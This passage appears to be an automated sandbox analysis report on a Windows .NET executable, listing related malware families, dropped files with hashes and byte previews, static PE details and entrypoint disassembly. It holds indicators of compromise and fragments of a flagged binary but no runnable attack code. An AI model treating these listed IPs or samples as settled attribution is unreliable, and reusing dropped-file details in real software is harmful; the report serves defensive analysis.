                                                                                                                                                                                                                  novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 57.196.194.180
                                                                                                                                                                                                                  novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 34.16.233.49
                                                                                                                                                                                                                  novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 51.244.0.239
                                                                                                                                                                                                                  novo.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 48.139.167.0
                                                                                                                                                                                                                  novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 34.182.187.24

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSecuriteInfo.com.Win32.MalwareX-gen.10870.27618.exeGet hashmaliciousAmadey, DarkTortilla, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                    q.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      5W69EF4IxU.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          10072024085940-0001 - HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exeGet hashmaliciousDarkTortilla, RemcosBrowse
                                                                                                                                                                                                                            0001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              P1-635487.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                Order List Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                    order.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_9dc28938-91ad-4d68-8a9f-87867cc31365\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):2.3046377270901885
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:aICmLyfC6jA2at2gCR0CPjzuiF9Y4lO8k:aIvyfC6jCtpw0QjzuiF9Y4lO8
                                                                                                                                                                                                                                      MD5:2B01D8AE203578B4E91AFFD2B4DE83EB
                                                                                                                                                                                                                                      SHA1:6AD485613B8BD3888FF87775766017F5282D4F06
                                                                                                                                                                                                                                      SHA-256:D54D503D5B0D182A465105A42B55777F1EC80243F3C264B172524D2DE3D95BB8
                                                                                                                                                                                                                                      SHA-512:BCEA8F028DC961A03044F7E1BD63ECDE5C45E798BFBE01F55BDA0463ACC0B0619353113076E3A08F27C65D2CBB0774846BD398D7B29A7B647F864923A9C7AF66
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.6.1.9.6.0.3.1.7.1.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.c.2.8.9.3.8.-.9.1.a.d.-.4.d.6.8.-.8.a.9.f.-.8.7.8.6.7.c.c.3.1.3.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.f.e.7.7.b.1.-.0.6.5.1.-.4.b.8.f.-.b.2.d.6.-.f.2.7.7.e.b.e.f.9.f.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.4.-.0.0.0.1.-.0.0.1.4.-.5.0.b.f.-.4.a.3.9.e.3.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EB8.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 17 streams, Wed Oct 2 16:59:23 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1009754
                                                                                                                                                                                                                                      Entropy (8bit):1.3985441790971482
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:TwdXkYmsIUSh6lKmhaQwu5sQXmY9l9oNNPtCpw6v0B2xpwIdbV:TwdXkYmsFSwlKZu5sbtC+6v/pbV
                                                                                                                                                                                                                                      MD5:50CABF4203478FA1EE8E97E86AA11C8E
                                                                                                                                                                                                                                      SHA1:A51E8F57CB98D97E06796E579D4DC8CB333F7884
                                                                                                                                                                                                                                      SHA-256:6D3F388785F5D1BE244344EAA4CD55CD248F544BD6B29FE5DB3CDE96954ADA36
                                                                                                                                                                                                                                      SHA-512:90A442A9FE2C81A3A9E1B31EFBD815E1414B959D8AA9B00826F473F5CC09337ED4C07FD15F387751C8423897B77A6F9E42DACA85756E7E6AFBE35EC66AFAD99A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MDMP..a..... ........{.f................ .......,k..........4...............P.......d...............x.......8...........T...$........\......................................................................................................................eJ..............Lw......................T...........xl.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A23.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10836
                                                                                                                                                                                                                                      Entropy (8bit):3.706545197478689
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJCex6YSQ2gmfqzViFprS89b/sSsVGY7f6Vm:R6lXJrx6Yl2gmfqzVO/sSOGY7fh
                                                                                                                                                                                                                                      MD5:A037F6F643E12119A36B45B5A37A34D7
                                                                                                                                                                                                                                      SHA1:6108CC379D60CE38CF8038EB175E561A023E659E
                                                                                                                                                                                                                                      SHA-256:5B0168421DB3300E94F87C71E10A9DBA8F56FF91B752DB95542E81D4A62646A1
                                                                                                                                                                                                                                      SHA-512:E36F2B5FA340FAD1824F08B147AEA98BC77DDE489A1A04CA2EBAAC16701201C64CA2EAA8FD91D44C4A9D8836653EC55484EDDA6492AF4873B42EF0B77AD1C573
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.4.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A53.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4724
                                                                                                                                                                                                                                      Entropy (8bit):4.4671952874293925
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsVJg771I9ITWpW8VYgYm8M4JYmFrZyq85cdcAb9Q32d:uIjfvI7zi7VcJjZxba32d
                                                                                                                                                                                                                                      MD5:00065564B531402D2995E8179794F807
                                                                                                                                                                                                                                      SHA1:4C11EDC73B3F64813225F1DDC8CA2F058AADE028
                                                                                                                                                                                                                                      SHA-256:CD95FFE44CB476DACD8372A652D2A0EEEF5E5BD4FD9D64E8BE4B96AE0C21D48D
                                                                                                                                                                                                                                      SHA-512:56EB95F3D8070F46A586ECD74BE137AE0D71B3D799ACE9A659B20C5D21304D99F58DE8DAD8DEC45715E56855110BC48CD01B11CF91E1D7C951389B227156073A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526082" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VFylJFPzqX.exe.log

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\VFylJFPzqX.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1626
                                                                                                                                                                                                                                      Entropy (8bit):5.352382879659022
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:MIHK5HKH1qHxviYHKh3oPtHo6hAHKze0HKHKMRmHKU57Uy:Pq5qHwRKYqh3oPtI6eqzxqqMRmqU57Uy
                                                                                                                                                                                                                                      MD5:13BD7BD30A00DB52928E54B1CDC3885E
                                                                                                                                                                                                                                      SHA1:505CA675FD9C4ABAA7422D0E300BC6DDC8C4E1CC
                                                                                                                                                                                                                                      SHA-256:9FDF5F0CD379E0870A8FDEA29B2AAAC93DEB66B91B41E66372CF0F3A7D3E7E14
                                                                                                                                                                                                                                      SHA-512:CDE3DD67B905244849E499CD0435D36457B31EE1DE74C4CF3D925C7D09E54DB862175B3CB143E14647E6341A7BA992E455B843907858DA0E067DADAD314F7A42
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):107416
                                                                                                                                                                                                                                      Entropy (8bit):4.001150460909278
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:Al8bkJGFKqXWIjk0QsVWohLNzLxKNCjBlzTPieb6PR1vP0TgJd5m5oypQqW3/gBJ:XkSKqTVWohDQeJBhOihGxnl5EFOPKSi
                                                                                                                                                                                                                                      MD5:D43EE2C1AF96AF9515F86181D714FEDC
                                                                                                                                                                                                                                      SHA1:0FDD8A1273BA02A6332660E2872A6826042AB5B6
                                                                                                                                                                                                                                      SHA-256:C3924EBA84DEC346B2788BDABA2BE6FCA9C6DA0DD282F9F1FB168B932EF53CBF
                                                                                                                                                                                                                                      SHA-512:7941575AF2BADC681E3E218127044DF6D6D4C55F40CE9D938D234E7BB8B0221BDDE856C8163F4369B35CBA427353E10847AAE09575B3E3AAB85C07C38182CE9D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):107416
                                                                                                                                                                                                                                      Entropy (8bit):4.001358683960633
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:/l81knGFKqXWIjk0QsVWohLNzLxKNCjBlzTPieb6PR1vP0TgJd5m5oypQqW3/gB7:IkMKqTVWohDQeJBhOihGxnl5EFOPKSI
                                                                                                                                                                                                                                      MD5:BFE555160AE823B8850B6278FB96C2FA
                                                                                                                                                                                                                                      SHA1:EBFD3E91DE012D0EFD8BAFD437DD84256476FC11
                                                                                                                                                                                                                                      SHA-256:787819813FAAF053C7F25C20236FB61FF89A269FD01DC131BF00D4E719168FAC
                                                                                                                                                                                                                                      SHA-512:1BC8C3F601FD1144CC7B2299AF1A6165CCF8729DBE08529B128F98DB03151E1B874EEA96CBD55E8FC992ECF7E4D187AE06E0AF01AAD277B866738BB7344ED1AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Windows[2].json

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):750
                                                                                                                                                                                                                                      Entropy (8bit):5.168607461759352
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YWgc2XmcWEUdH+ucWEU1zdtmwDYyaH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCh:Yzc2Wc4H7cuDFaHt0drc6hE14
                                                                                                                                                                                                                                      MD5:89484D8093A982ECBB37A5CE39E33BD0
                                                                                                                                                                                                                                      SHA1:9A940F3FDF273125A4AC94F324816D637BC9B832
                                                                                                                                                                                                                                      SHA-256:4F46B87D2013949D3A34E45CADB8B9A74714CC5503084090BFD6C53840C5ED53
                                                                                                                                                                                                                                      SHA-512:2060B613BB5995FFE54E0F1B8958D6C4E55DFCBCD4CD1CCD23EED2A072E6F123BB3D328D63E77E3440576997DC121413E0C4DFE094B04BEBCE2E789E4481E67A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"serviceContext":{"serviceActivityId":"2850ec61-2123-4343-9925-7250149d471e","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"2850ec61-2123-4343-9925-7250149d471e|2024-10-02T16:59:31.8062809Z|fabric_msn|EUS2-A|News_579"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\VFylJFPzqX.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):43008
                                                                                                                                                                                                                                      Entropy (8bit):6.244941989510716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:ac3JOvwWj8Gpw0A67dOpRipKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+TsPZX:a4JU8g17dG6Iq8XMnVYqW2Xmh829ukc
                                                                                                                                                                                                                                      MD5:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                      SHA1:E73D73F42BB2A310F03EB1BCBB22BE2B8EB7C723
                                                                                                                                                                                                                                      SHA-256:C1CF3DC8FA1C7FC00F88E07AD539979B3706CA8D69223CFFD1D58BC8F521F63A
                                                                                                                                                                                                                                      SHA-512:8261828D55F3B5134C0AEB98311C04E20C5395D4347251746F3BE0FB854F36CC7E118713CD00C9867537E6E47D5E71F2B2384FC00C67F0AE1B285B8310321579
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: SecuriteInfo.com.Win32.MalwareX-gen.10870.27618.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: q.bin.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: 5W69EF4IxU.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: LisectAVT_2403002A_74.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: 10072024085940-0001 - HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: 0001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: P1-635487.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Order List Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: order.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D>.]..............0..X...........w... ........@.. ..............................p.....`.................................Hw..O....... ............f...B...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):5.397522549586606
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                      File name:VFylJFPzqX.exe
                                                                                                                                                                                                                                      File size:1'085'440 bytes
                                                                                                                                                                                                                                      MD5:e9e768aa357a7e34348c69e41444964d
                                                                                                                                                                                                                                      SHA1:4930b85e20b7967cf0afb1d9ae9ae57ca4d373c9
                                                                                                                                                                                                                                      SHA256:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b
                                                                                                                                                                                                                                      SHA512:6394564277e7077d9e326cc0f34f3c6ef945ed4d2e6bd812daaef879bb957edd4c8032df14774328799c692cbfb1f784fbf3580e65effdc5d2d42f124f62bb3a
                                                                                                                                                                                                                                      SSDEEP:12288:LKLRCoZzl+CN6XYt8GjKtzp422BxYLWM7Wi9h77:LiCoZzkg8tzpH2BK17L9h77
                                                                                                                                                                                                                                      TLSH:13357A2632BB5BD0E878C3345620C03447F3ADC6E612C69E7DDD6E8F76E0A41566263E
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......+.........."...P..,...b.......J... ...`....@.. ....................................`................................

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:0731d0cc686d2907

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x4a4a8e
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x2B14AE88 [Thu Nov 26 11:01:28 1992 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
